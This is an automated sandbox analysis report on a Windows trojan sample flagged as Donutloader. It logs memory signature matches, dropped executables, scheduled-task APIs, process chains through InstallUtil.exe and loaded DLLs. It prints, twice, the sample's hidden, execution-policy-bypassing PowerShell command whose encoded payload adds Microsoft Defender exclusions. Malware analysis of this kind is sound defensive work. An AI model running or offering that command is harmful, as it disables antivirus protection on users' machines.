Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@9/15@2/2
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E078D4 AdjustTokenPrivileges,
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\RegisteredChannels
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7756:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\210888
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8164:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xiv0j5rn.pb1.ps1
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: file.exeReversingLabs: Detection: 13%
                    Source: file.exeVirustotal: Detection: 39%
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dll
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: sxs.dll
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeSection loaded: xmllite.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: taskschd.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
